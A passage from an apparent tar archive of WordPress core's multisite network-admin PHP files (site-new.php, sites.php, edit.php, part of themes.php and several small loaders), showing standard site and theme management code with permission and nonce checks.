little while, so please be patient.' ); ?></p> <p><a class="button button-primary" href="upgrade.php?action=upgrade"><?php _e( 'Upgrade Network' ); ?></a></p> <?php /** * Fires before the footer on the network upgrade screen. * * @since MU (3.0.0) */ do_action( 'wpmu_upgrade_page' ); break; } ?> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> network/setup.php 0000644 00000000367 15226322564 0010123 0 ustar 00 <?php /** * Network Setup administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/network.php'; network/site-new.php 0000644 00000023007 15226322564 0010512 0 ustar 00 <?php /** * Add Site Administration Screen * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; /** WordPress Translation Installation API */ require_once ABSPATH . 'wp-admin/includes/translation-install.php'; if ( ! current_user_can( 'create_sites' ) ) { wp_die( __( 'Sorry, you are not allowed to add sites to this network.' ) ); } get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'This screen is for Super Admins to add new sites to the network. This is not affected by the registration settings.' ) . '</p>' . '<p>' . __( 'If the admin email for the new site does not exist in the database, a new user will also be created.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://developer.wordpress.org/advanced-administration/multisite/admin/#network-admin-sites-screen">Documentation on Site Management</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forum/multisite/">Support forums</a>' ) . '</p>' ); if ( isset( $_REQUEST['action'] ) && 'add-site' === $_REQUEST['action'] ) { check_admin_referer( 'add-blog', '_wpnonce_add-blog' ); if ( ! is_array( $_POST['blog'] ) ) { wp_die( __( 'Cannot create an empty site.' ) ); } $blog = $_POST['blog']; $domain = ''; $blog['domain'] = trim( $blog['domain'] ); if ( preg_match( '|^([a-zA-Z0-9-])+$|', $blog['domain'] ) ) { $domain = strtolower( $blog['domain'] ); } // If not a subdomain installation, make sure the domain isn't a reserved word. if ( ! is_subdomain_install() ) { $subdirectory_reserved_names = get_subdirectory_reserved_names(); if ( in_array( $domain, $subdirectory_reserved_names, true ) ) { wp_die( sprintf( /* translators: %s: Reserved names list. */ __( 'The following words are reserved for use by WordPress functions and cannot be used as site names: %s' ), '<code>' . implode( '</code>, <code>', $subdirectory_reserved_names ) . '</code>' ) ); } } $title = $blog['title']; $meta = array( 'public' => 1, ); // Handle translation installation for the new site. if ( isset( $_POST['WPLANG'] ) ) { if ( '' === $_POST['WPLANG'] ) { $meta['WPLANG'] = ''; // en_US } elseif ( in_array( $_POST['WPLANG'], get_available_languages(), true ) ) { $meta['WPLANG'] = $_POST['WPLANG']; } elseif ( current_user_can( 'install_languages' ) && wp_can_install_language_pack() ) { $language = wp_download_language_pack( wp_unslash( $_POST['WPLANG'] ) ); if ( $language ) { $meta['WPLANG'] = $language; } } } if ( empty( $title ) ) { wp_die( __( 'Missing site title.' ) ); } if ( empty( $domain ) ) { wp_die( __( 'Missing or invalid site address.' ) ); } if ( isset( $blog['email'] ) && '' === trim( $blog['email'] ) ) { wp_die( __( 'Missing email address.' ) ); } $email = sanitize_email( $blog['email'] ); if ( ! is_email( $email ) ) { wp_die( __( 'Invalid email address.' ) ); } if ( is_subdomain_install() ) { $newdomain = $domain . '.' . preg_replace( '|^www\.|', '', get_network()->domain ); $path = get_network()->path; } else { $newdomain = get_network()->domain; $path = get_network()->path . $domain . '/'; } $password = 'N/A'; $user_id = email_exists( $email ); if ( ! $user_id ) { // Create a new user with a random password. /** * Fires immediately before a new user is created via the network site-new.php page. * * @since 4.5.0 * * @param string $email Email of the non-existent user. */ do_action( 'pre_network_site_new_created_user', $email ); $user_id = username_exists( $domain ); if ( $user_id ) { wp_die( __( 'The domain or path entered conflicts with an existing username.' ) ); } $password = wp_generate_password( 12, false ); $user_id = wpmu_create_user( $domain, $password, $email ); if ( false === $user_id ) { wp_die( __( 'There was an error creating the user.' ) ); } /** * Fires after a new user has been created via the network site-new.php page. * * @since 4.4.0 * * @param int $user_id ID of the newly created user. */ do_action( 'network_site_new_created_user', $user_id ); } $wpdb->hide_errors(); $id = wpmu_create_blog( $newdomain, $path, $title, $user_id, $meta, get_current_network_id() ); $wpdb->show_errors(); if ( ! is_wp_error( $id ) ) { if ( ! is_super_admin( $user_id ) && ! get_user_option( 'primary_blog', $user_id ) ) { update_user_option( $user_id, 'primary_blog', $id, true ); } wpmu_new_site_admin_notification( $id, $user_id ); wpmu_welcome_notification( $id, $user_id, $password, $title, array( 'public' => 1 ) ); wp_redirect( add_query_arg( array( 'update' => 'added', 'id' => $id, ), 'site-new.php' ) ); exit; } else { wp_die( $id->get_error_message() ); } } if ( isset( $_GET['update'] ) ) { $messages = array(); if ( 'added' === $_GET['update'] ) { $messages[] = sprintf( /* translators: 1: Dashboard URL, 2: Network admin edit URL. */ __( 'Site added. <a href="%1$s">Visit Dashboard</a> or <a href="%2$s">Edit Site</a>' ), esc_url( get_admin_url( absint( $_GET['id'] ) ) ), network_admin_url( 'site-info.php?id=' . absint( $_GET['id'] ) ) ); } } // Used in the HTML title tag. $title = __( 'Add Site' ); $parent_file = 'sites.php'; wp_enqueue_script( 'user-suggest' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1 id="add-new-site"><?php _e( 'Add Site' ); ?></h1> <?php if ( ! empty( $messages ) ) { $notice_args = array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ); foreach ( $messages as $msg ) { wp_admin_notice( $msg, $notice_args ); } } ?> <p><?php echo wp_required_field_message(); ?></p> <form method="post" enctype="multipart/form-data" action="<?php echo esc_url( network_admin_url( 'site-new.php?action=add-site' ) ); ?>" novalidate="novalidate"> <?php wp_nonce_field( 'add-blog', '_wpnonce_add-blog' ); ?> <table class="form-table" role="presentation"> <tr class="form-field form-required"> <th scope="row"> <label for="site-address"> <?php _e( 'Site Address (URL)' ); echo ' ' . wp_required_field_indicator(); ?> </label> </th> <td> <span class="code"> <?php if ( is_subdomain_install() ) : ?> <input name="blog[domain]" type="text" class="regular-text code" id="site-address" aria-describedby="site-address-desc" autocapitalize="none" autocorrect="off" required /><!-- --><code class="no-break"><?php echo esc_html( '.' . preg_replace( '|^www\.|', '', get_network()->domain ) ); ?></code> <?php else : ?> <code class="no-break"><?php echo esc_html( get_network()->domain . get_network()->path ); ?></code><!-- --><input name="blog[domain]" type="text" class="regular-text code" id="site-address" aria-describedby="site-address-desc" autocapitalize="none" autocorrect="off" required /> <?php endif; ?> </span> <p class="description" id="site-address-desc"> <?php _e( 'Only lowercase letters (a-z), numbers, and hyphens are allowed.' ); ?> </p> </td> </tr> <tr class="form-field form-required"> <th scope="row"> <label for="site-title"> <?php _e( 'Site Title' ); echo ' ' . wp_required_field_indicator(); ?> </label> </th> <td><input name="blog[title]" type="text" class="regular-text" id="site-title" required /></td> </tr> <?php $languages = get_available_languages(); $translations = wp_get_available_translations(); if ( ! empty( $languages ) || ! empty( $translations ) ) : ?> <tr class="form-field form-required"> <th scope="row"><label for="site-language"><?php _e( 'Site Language' ); ?></label></th> <td> <?php // Network default. $lang = get_site_option( 'WPLANG' ); // Use English if the default isn't available. if ( ! in_array( $lang, $languages, true ) ) { $lang = ''; } wp_dropdown_languages( array( 'name' => 'WPLANG', 'id' => 'site-language', 'selected' => $lang, 'languages' => $languages, 'translations' => $translations, 'show_available_translations' => current_user_can( 'install_languages' ) && wp_can_install_language_pack(), ) ); ?> </td> </tr> <?php endif; // Languages. ?> <tr class="form-field form-required"> <th scope="row"> <label for="admin-email"> <?php _e( 'Admin Email' ); echo ' ' . wp_required_field_indicator(); ?> </label> </th> <td><input name="blog[email]" type="email" class="regular-text wp-suggest-user" id="admin-email" data-autocomplete-type="search" data-autocomplete-field="user_email" aria-describedby="site-admin-email" required /></td> </tr> <tr class="form-field"> <td colspan="2" class="td-full"><p id="site-admin-email"><?php _e( 'A new user will be created if the above email address is not in the database.' ); ?><br /><?php _e( 'The username and a link to set the password will be mailed to this email address.' ); ?></p></td> </tr> </table> <?php /** * Fires at the end of the new site form in network admin. * * @since 4.5.0 */ do_action( 'network_site_new_form' ); submit_button( __( 'Add Site' ), 'primary', 'add-site' ); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; network/credits.php 0000644 00000000371 15226322564 0010413 0 ustar 00 <?php /** * Network Credits administration panel. * * @package WordPress * @subpackage Multisite * @since 3.4.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/credits.php'; network/edit.php 0000644 00000001556 15226322564 0007711 0 ustar 00 <?php /** * Action handler for Multisite administration panels. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; $action = $_GET['action'] ?? ''; if ( empty( $action ) ) { wp_redirect( network_admin_url() ); exit; } /** * Fires just before the action handler in several Network Admin screens. * * This hook fires on multiple screens in the Multisite Network Admin, * including Users, Network Settings, and Site Settings. * * @since 3.0.0 */ do_action( 'wpmuadminedit' ); /** * Fires the requested handler action. * * The dynamic portion of the hook name, `$action`, refers to the name * of the requested action derived from the `GET` request. * * @since 3.1.0 */ do_action( "network_admin_edit_{$action}" ); wp_redirect( network_admin_url() ); exit; network/plugins.php 0000644 00000000371 15226322564 0010437 0 ustar 00 <?php /** * Network Plugins administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/plugins.php'; network/theme-editor.php 0000644 00000000410 15226322564 0011336 0 ustar 00 <?php /** * Theme file editor network administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/theme-editor.php'; network/freedoms.php 0000644 00000000373 15226322564 0010564 0 ustar 00 <?php /** * Network Freedoms administration panel. * * @package WordPress * @subpackage Multisite * @since 3.4.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; require ABSPATH . 'wp-admin/freedoms.php'; network/sites.php 0000644 00000034374 15226322564 0010117 0 ustar 00 <?php /** * Multisite sites administration panel. * * @package WordPress * @subpackage Multisite * @since 3.0.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_sites' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), 403 ); } $wp_list_table = _get_list_table( 'WP_MS_Sites_List_Table' ); $pagenum = $wp_list_table->get_pagenum(); // Used in the HTML title tag. $title = __( 'Sites' ); $parent_file = 'sites.php'; add_screen_option( 'per_page' ); get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . __( 'Add Site takes you to the screen for adding a new site to the network. You can search for a site by Name, ID number, or IP address. Screen Options allows you to choose how many sites to display on one page.' ) . '</p>' . '<p>' . __( 'This is the main table of all sites on this network. Switch between list and excerpt views by using the icons above the right side of the table.' ) . '</p>' . '<p>' . __( 'Hovering over each site reveals seven options (three for the primary site):' ) . '</p>' . '<ul><li>' . __( 'An Edit link to a separate Edit Site screen.' ) . '</li>' . '<li>' . __( 'Dashboard leads to the Dashboard for that site.' ) . '</li>' . '<li>' . __( 'Flag for Deletion, Archive, and Spam which lead to confirmation screens. These actions can be reversed later.' ) . '</li>' . '<li>' . __( 'Delete Permanently which is a permanent action after the confirmation screen.' ) . '</li>' . '<li>' . __( 'Visit to go to the front-end of the live site.' ) . '</li></ul>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://developer.wordpress.org/advanced-administration/multisite/admin/#network-admin-sites-screen">Documentation on Site Management</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forum/multisite/">Support forums</a>' ) . '</p>' ); get_current_screen()->set_screen_reader_content( array( 'heading_pagination' => __( 'Sites list navigation' ), 'heading_list' => __( 'Sites list' ), ) ); $id = isset( $_REQUEST['id'] ) ? (int) $_REQUEST['id'] : 0; if ( isset( $_GET['action'] ) ) { /** This action is documented in wp-admin/network/edit.php */ do_action( 'wpmuadminedit' ); // A list of valid actions and their associated messaging for confirmation output. $manage_actions = array( /* translators: %s: Site URL. */ 'activateblog' => __( 'You are about to remove the deletion flag from the site %s.' ), /* translators: %s: Site URL. */ 'deactivateblog' => __( 'You are about to flag the site %s for deletion.' ), /* translators: %s: Site URL. */ 'unarchiveblog' => __( 'You are about to unarchive the site %s.' ), /* translators: %s: Site URL. */ 'archiveblog' => __( 'You are about to archive the site %s.' ), /* translators: %s: Site URL. */ 'unspamblog' => __( 'You are about to unspam the site %s.' ), /* translators: %s: Site URL. */ 'spamblog' => __( 'You are about to mark the site %s as spam.' ), /* translators: %s: Site URL. */ 'deleteblog' => __( 'You are about to delete the site %s.' ), /* translators: %s: Site URL. */ 'unmatureblog' => __( 'You are about to mark the site %s as mature.' ), /* translators: %s: Site URL. */ 'matureblog' => __( 'You are about to mark the site %s as not mature.' ), ); if ( 'confirm' === $_GET['action'] ) { // The action2 parameter contains the action being taken on the site. $site_action = $_GET['action2']; if ( ! array_key_exists( $site_action, $manage_actions ) ) { wp_die( __( 'The requested action is not valid.' ) ); } // The mature/unmature UI exists only as external code. Check the "confirm" nonce for backward compatibility. if ( 'matureblog' === $site_action || 'unmatureblog' === $site_action ) { check_admin_referer( 'confirm' ); } else { check_admin_referer( $site_action . '_' . $id ); } if ( ! headers_sent() ) { nocache_headers(); header( 'Content-Type: text/html; charset=utf-8' ); } if ( is_main_site( $id ) ) { wp_die( __( 'Sorry, you are not allowed to change the current site.' ) ); } $site_details = get_site( $id ); $site_address = untrailingslashit( $site_details->domain . $site_details->path ); $submit = __( 'Confirm' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php _e( 'Confirm your action' ); ?></h1> <form action="sites.php?action=<?php echo esc_attr( $site_action ); ?>" method="post"> <input type="hidden" name="action" value="<?php echo esc_attr( $site_action ); ?>" /> <input type="hidden" name="id" value="<?php echo esc_attr( $id ); ?>" /> <input type="hidden" name="_wp_http_referer" value="<?php echo esc_attr( wp_get_referer() ); ?>" /> <?php wp_nonce_field( $site_action . '_' . $id, '_wpnonce', false ); ?> <?php if ( 'deleteblog' === $site_action ) { $submit = __( 'Delete this site permanently' ); ?> <div class="notice notice-warning inline"> <p><?php _e( 'Deleting a site is a permanent action that cannot be undone. This will delete the entire site and its uploads directory.' ); ?> </div> <?php } elseif ( 'archiveblog' === $site_action ) { ?> <div class="notice notice-warning inline"> <p><?php _e( 'Archiving a site makes the site unavailable to its users and visitors. This is a reversible action.' ); ?> </div> <?php } elseif ( 'deactivateblog' === $site_action ) { ?> <div class="notice notice-warning inline"> <p><?php _e( 'Flagging a site for deletion makes the site unavailable to its users and visitors. This is a reversible action. A super admin can permanently delete the site at a later date.' ); ?> </div> <?php } ?> <p><?php printf( $manage_actions[ $site_action ], "<strong>{$site_address}</strong>" ); ?></p> <?php submit_button( $submit, 'primary' ); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; exit; } elseif ( array_key_exists( $_GET['action'], $manage_actions ) ) { $action = $_GET['action']; check_admin_referer( $action . '_' . $id ); } elseif ( 'allblogs' === $_GET['action'] ) { check_admin_referer( 'bulk-sites' ); } $updated_action = ''; switch ( $_GET['action'] ) { case 'deleteblog': if ( ! current_user_can( 'delete_sites' ) ) { wp_die( __( 'Sorry, you are not allowed to access this page.' ), '', array( 'response' => 403 ) ); } $updated_action = 'not_deleted'; if ( 0 !== $id && ! is_main_site( $id ) && current_user_can( 'delete_site', $id ) ) { wpmu_delete_blog( $id, true ); $updated_action = 'delete'; } break; case 'delete_sites': check_admin_referer( 'ms-delete-sites' ); foreach ( (array) $_POST['site_ids'] as $site_id ) { $site_id = (int) $site_id; if ( is_main_site( $site_id ) ) { continue; } if ( ! current_user_can( 'delete_site', $site_id ) ) { $site = get_site( $site_id ); $site_address = untrailingslashit( $site->domain . $site->path ); wp_die( sprintf( /* translators: %s: Site URL. */ __( 'Sorry, you are not allowed to delete the site %s.' ), $site_address ), 403 ); } $updated_action = 'all_delete'; wpmu_delete_blog( $site_id, true ); } break; case 'allblogs': if ( isset( $_POST['action'] ) && isset( $_POST['allblogs'] ) ) { $doaction = $_POST['action']; foreach ( (array) $_POST['allblogs'] as $site_id ) { $site_id = (int) $site_id; if ( 0 !== $site_id && ! is_main_site( $site_id ) ) { switch ( $doaction ) { case 'delete': require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php _e( 'Confirm your action' ); ?></h1> <form action="sites.php?action=delete_sites" method="post"> <input type="hidden" name="action" value="delete_sites" /> <input type="hidden" name="_wp_http_referer" value="<?php echo esc_attr( wp_get_referer() ); ?>" /> <?php wp_nonce_field( 'ms-delete-sites', '_wpnonce', false ); ?> <div class="notice notice-warning inline"> <p><?php _e( 'Deleting a site is a permanent action that cannot be undone. This will delete the entire site and its uploads directory.' ); ?> </div> <p><?php _e( 'You are about to delete the following sites:' ); ?></p> <ul class="ul-disc"> <?php foreach ( $_POST['allblogs'] as $site_id ) : $site_id = (int) $site_id; $site = get_site( $site_id ); $site_address = untrailingslashit( $site->domain . $site->path ); ?> <li> <?php echo $site_address; ?> <input type="hidden" name="site_ids[]" value="<?php echo esc_attr( $site_id ); ?>" /> </li> <?php endforeach; ?> </ul> <?php submit_button( __( 'Delete these sites permanently' ), 'primary' ); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; exit; // By exiting, there's no longer a switch to break out of. case 'spam': case 'notspam': $updated_action = ( 'spam' === $doaction ) ? 'all_spam' : 'all_notspam'; update_blog_status( $site_id, 'spam', ( 'spam' === $doaction ) ? '1' : '0' ); break; } } else { wp_die( __( 'Sorry, you are not allowed to change the current site.' ) ); } } if ( ! in_array( $doaction, array( 'delete', 'spam', 'notspam' ), true ) ) { $redirect_to = wp_get_referer(); $blogs = (array) $_POST['allblogs']; /** This action is documented in wp-admin/network/site-themes.php */ $redirect_to = apply_filters( 'handle_network_bulk_actions-' . get_current_screen()->id, $redirect_to, $doaction, $blogs, $id ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores wp_safe_redirect( $redirect_to ); exit; } } else { // Process query defined by WP_MS_Site_List_Table::extra_table_nav(). $location = remove_query_arg( array( '_wp_http_referer', '_wpnonce' ), add_query_arg( $_POST, network_admin_url( 'sites.php' ) ) ); wp_redirect( $location ); exit; } break; case 'archiveblog': case 'unarchiveblog': update_blog_status( $id, 'archived', ( 'archiveblog' === $_GET['action'] ) ? '1' : '0' ); break; case 'activateblog': update_blog_status( $id, 'deleted', '0' ); /** * Fires after a network site has its deletion flag removed. * * @since MU (3.0.0) * * @param int $id The ID of the reactivated site. */ do_action( 'activate_blog', $id ); break; case 'deactivateblog': /** * Fires before a network site is flagged for deletion. * * @since MU (3.0.0) * * @param int $id The ID of the site being flagged for deletion. */ do_action( 'deactivate_blog', $id ); update_blog_status( $id, 'deleted', '1' ); break; case 'unspamblog': case 'spamblog': update_blog_status( $id, 'spam', ( 'spamblog' === $_GET['action'] ) ? '1' : '0' ); break; case 'unmatureblog': case 'matureblog': update_blog_status( $id, 'mature', ( 'matureblog' === $_GET['action'] ) ? '1' : '0' ); break; } if ( empty( $updated_action ) && array_key_exists( $_GET['action'], $manage_actions ) ) { $updated_action = $_GET['action']; } if ( ! empty( $updated_action ) ) { wp_safe_redirect( add_query_arg( array( 'updated' => $updated_action ), wp_get_referer() ) ); exit; } } $msg = ''; if ( isset( $_GET['updated'] ) ) { $action = $_GET['updated']; switch ( $action ) { case 'all_notspam': $msg = __( 'Sites removed from spam.' ); break; case 'all_spam': $msg = __( 'Sites marked as spam.' ); break; case 'all_delete': $msg = __( 'Sites permanently deleted.' ); break; case 'delete': $msg = __( 'Site permanently deleted.' ); break; case 'not_deleted': $msg = __( 'Sorry, you are not allowed to delete that site.' ); break; case 'archiveblog': $msg = __( 'Site archived.' ); break; case 'unarchiveblog': $msg = __( 'Site unarchived.' ); break; case 'activateblog': $msg = __( 'Site deletion flag removed.' ); break; case 'deactivateblog': $msg = __( 'Site flagged for deletion.' ); break; case 'unspamblog': $msg = __( 'Site removed from spam.' ); break; case 'spamblog': $msg = __( 'Site marked as spam.' ); break; default: /** * Filters a specific, non-default, site-updated message in the Network admin. * * The dynamic portion of the hook name, `$action`, refers to the non-default * site update action. * * @since 3.1.0 * * @param string $msg The update message. Default 'Settings saved'. */ $msg = apply_filters( "network_sites_updated_message_{$action}", __( 'Settings saved.' ) ); break; } if ( ! empty( $msg ) ) { $msg = wp_get_admin_notice( $msg, array( 'type' => 'success', 'dismissible' => true, 'id' => 'message', ) ); } } $wp_list_table->prepare_items(); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1 class="wp-heading-inline"><?php _e( 'Sites' ); ?></h1> <?php if ( current_user_can( 'create_sites' ) ) : ?> <a href="<?php echo esc_url( network_admin_url( 'site-new.php' ) ); ?>" class="page-title-action"><?php echo esc_html__( 'Add Site' ); ?></a> <?php endif; ?> <?php if ( isset( $_REQUEST['s'] ) && strlen( $_REQUEST['s'] ) ) { echo '<span class="subtitle">'; printf( /* translators: %s: Search query. */ __( 'Search results for: %s' ), '<strong>' . esc_html( $s ) . '</strong>' ); echo '</span>'; } ?> <hr class="wp-header-end"> <?php $wp_list_table->views(); ?> <?php echo $msg; ?> <form method="get" id="ms-search" class="wp-clearfix"> <?php $wp_list_table->search_box( __( 'Search Sites' ), 'site' ); ?> <input type="hidden" name="action" value="blogs" /> </form> <form id="form-site-list" action="sites.php?action=allblogs" method="post"> <?php $wp_list_table->display(); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> network/themes.php 0000644 00000037134 15226322564 0010252 0 ustar 00 <?php /** * Multisite themes administration panel. * * @package WordPress * @subpackage Multisite * @since 3.1.0 */ /** Load WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_network_themes' ) ) { wp_die( __( 'Sorry, you are not allowed to manage network themes.' ) ); } $wp_list_table = _get_list_table( 'WP_MS_Themes_List_Table' ); $pagenum = $wp_list_table->get_pagenum(); $action = $wp_list_table->current_action(); $s = $_REQUEST['s'] ?? ''; // Clean up request URI from temporary args for screen options/paging uri's to work as expected. $temp_args = array( 'enabled', 'disabled', 'deleted', 'error', 'enabled-auto-update', 'disabled-auto-update', ); $_SERVER['REQUEST_URI'] = remove_query_arg( $temp_args, $_SERVER['REQUEST_URI'] ); $referer = remove_query_arg( $temp_args, wp_get_referer() ); if ( $action ) { switch ( $action ) { case 'enable': check_admin_referer( 'enable-theme_' . $_GET['theme'] ); WP_Theme::network_enable_theme( $_GET['theme'] ); if ( ! str_contains( $referer, '/network/themes.php' ) ) { wp_redirect( network_admin_url( 'themes.php?enabled=1' ) ); } else { wp_safe_redirect( add_query_arg( 'enabled', 1, $referer ) ); } exit; case 'disable': check_admin_referer( 'disable-theme_' . $_GET['theme'] ); WP_Theme::network_disable_theme( $_GET['theme'] ); wp_safe_redirect( add_query_arg( 'disabled', '1', $referer ) ); exit; case 'enable-selected': check_admin_referer( 'bulk-themes' ); $themes = isset( $_POST['checked'] ) ? (array) $_POST['checked'] : array(); if ( empty( $themes ) ) { wp_safe_redirect( add_query_arg( 'error', 'none', $referer ) ); exit; } WP_Theme::network_enable_theme( (array) $themes ); wp_safe_redirect( add_query_arg( 'enabled', count( $themes ), $referer ) ); exit; case 'disable-selected': check_admin_referer( 'bulk-themes' ); $themes = isset( $_POST['checked'] ) ? (array) $_POST['checked'] : array(); if ( empty( $themes ) ) { wp_safe_redirect( add_query_arg( 'error', 'none', $referer ) ); exit; } WP_Theme::network_disable_theme( (array) $themes ); wp_safe_redirect( add_query_arg( 'disabled', count( $themes ), $referer ) ); exit; case 'update-selected': check_admin_referer( 'bulk-themes' ); if ( isset( $_GET['themes'] ) ) { $themes = explode( ',', $_GET['themes'] ); } elseif ( isset( $_POST['checked'] ) ) { $themes = (array) $_POST['checked']; } else { $themes = array(); } // Used in the HTML title tag. $title = __( 'Update Themes' ); $parent_file = 'themes.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; echo '<div class="wrap">'; echo '<h1>' . esc_html( $title ) . '</h1>'; $url = self_admin_url( 'update.php?action=update-selected-themes&themes=' . urlencode( implode( ',', $themes ) ) ); $url = wp_nonce_url( $url, 'bulk-update-themes' ); echo "<iframe src='$url' style='width: 100%; height:100%; min-height:850px;'></iframe>"; echo '</div>'; require_once ABSPATH . 'wp-admin/admin-footer.php'; exit; case 'delete-selected': if ( ! current_user_can( 'delete_themes' ) ) { wp_die( __( 'Sorry, you are not allowed to delete themes for this site.' ) ); } check_admin_referer( 'bulk-themes' ); $themes = isset( $_REQUEST['checked'] ) ? (array) $_REQUEST['checked'] : array(); if ( empty( $themes ) ) { wp_safe_redirect( add_query_arg( 'error', 'none', $referer ) ); exit; } $themes = array_diff( $themes, array( get_option( 'stylesheet' ), get_option( 'template' ) ) ); if ( empty( $themes ) ) { wp_safe_redirect( add_query_arg( 'error', 'main', $referer ) ); exit; } $theme_info = array(); foreach ( $themes as $key => $theme ) { $theme_info[ $theme ] = wp_get_theme( $theme ); } require ABSPATH . 'wp-admin/update.php'; $parent_file = 'themes.php'; if ( ! isset( $_REQUEST['verify-delete'] ) ) { wp_enqueue_script( 'jquery' ); require_once ABSPATH . 'wp-admin/admin-header.php'; $themes_to_delete = count( $themes ); ?> <div class="wrap"> <?php if ( 1 === $themes_to_delete ) : ?> <h1><?php _e( 'Delete Theme' ); ?></h1> <?php wp_admin_notice( '<strong>' . __( 'Caution:' ) . '</strong> ' . __( 'This theme may be active on other sites in the network.' ), array( 'additional_classes' => array( 'error' ), ) ); ?> <p><?php _e( 'You are about to remove the following theme:' ); ?></p> <?php else : ?> <h1><?php _e( 'Delete Themes' ); ?></h1> <?php wp_admin_notice( '<strong>' . __( 'Caution:' ) . '</strong> ' . __( 'These themes may be active on other sites in the network.' ), array( 'additional_classes' => array( 'error' ), ) ); ?> <p><?php _e( 'You are about to remove the following themes:' ); ?></p> <?php endif; ?> <ul class="ul-disc"> <?php foreach ( $theme_info as $theme ) { echo '<li>' . sprintf( /* translators: 1: Theme name, 2: Theme author. */ _x( '%1$s by %2$s', 'theme' ), '<strong>' . $theme->display( 'Name' ) . '</strong>', '<em>' . $theme->display( 'Author' ) . '</em>' ) . '</li>'; } ?> </ul> <?php if ( 1 === $themes_to_delete ) : ?> <p><?php _e( 'Are you sure you want to delete this theme?' ); ?></p> <?php else : ?> <p><?php _e( 'Are you sure you want to delete these themes?' ); ?></p> <?php endif; ?> <form method="post" action="<?php echo esc_url( $_SERVER['REQUEST_URI'] ); ?>" style="display:inline;"> <input type="hidden" name="verify-delete" value="1" /> <input type="hidden" name="action" value="delete-selected" /> <?php foreach ( (array) $themes as $theme ) { echo '<input type="hidden" name="checked[]" value="' . esc_attr( $theme ) . '" />'; } wp_nonce_field( 'bulk-themes' ); if ( 1 === $themes_to_delete ) { submit_button( __( 'Yes, delete this theme' ), '', 'submit', false ); } else { submit_button( __( 'Yes, delete these themes' ), '', 'submit', false ); } ?> </form> <?php $referer = wp_get_referer(); ?> <form method="post" action="<?php echo $referer ? esc_url( $referer ) : ''; ?>" style="display:inline;"> <?php submit_button( __( 'No, return me to the theme list' ), '', 'submit', false ); ?> </form> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; exit; } // End if verify-delete. foreach ( $themes as $theme ) { $delete_result = delete_theme( $theme, esc_url( add_query_arg( array( 'verify-delete' => 1, 'action' => 'delete-selected', 'checked' => $_REQUEST['checked'], '_wpnonce' => $_REQUEST['_wpnonce'], ), network_admin_url( 'themes.php' ) ) ) ); } $paged = ( $_REQUEST['paged'] ) ? $_REQUEST['paged'] : 1; wp_redirect( add_query_arg( array( 'deleted' => count( $themes ), 'paged' => $paged, 's' => $s, ), network_admin_url( 'themes.php' ) ) ); exit; case 'enable-auto-update': case 'disable-auto-update': case 'enable-auto-update-selected': case 'disable-auto-update-selected': if ( ! ( current_user_can( 'update_themes' ) && wp_is_auto_update_enabled_for_type( 'theme' ) ) ) { wp_die( __( 'Sorry, you are not allowed to change themes automatic update settings.' ) ); } if ( 'enable-auto-update' === $action || 'disable-auto-update' === $action ) { check_admin_referer( 'updates' ); } else { if ( empty( $_POST['checked'] ) ) { // Nothing to do. wp_safe_redirect( add_query_arg( 'error', 'none', $referer ) ); exit; } check_admin_referer( 'bulk-themes' ); } $auto_updates = (array) get_site_option( 'auto_update_themes', array() ); if ( 'enable-auto-update' === $action ) { $auto_updates[] = $_GET['theme']; $auto_updates = array_unique( $auto_updates ); $referer = add_query_arg( 'enabled-auto-update', 1, $referer ); } elseif ( 'disable-auto-update' === $action ) { $auto_updates = array_diff( $auto_updates, array( $_GET['theme'] ) ); $referer = add_query_arg( 'disabled-auto-update', 1, $referer ); } else { // Bulk enable/disable. $themes = (array) wp_unslash( $_POST['checked'] ); if ( 'enable-auto-update-selected' === $action ) { $auto_updates = array_merge( $auto_updates, $themes ); $auto_updates = array_unique( $auto_updates ); $referer = add_query_arg( 'enabled-auto-update', count( $themes ), $referer ); } else { $auto_updates = array_diff( $auto_updates, $themes ); $referer = add_query_arg( 'disabled-auto-update', count( $themes ), $referer ); } } $all_items = wp_get_themes(); // Remove themes that don't exist or have been 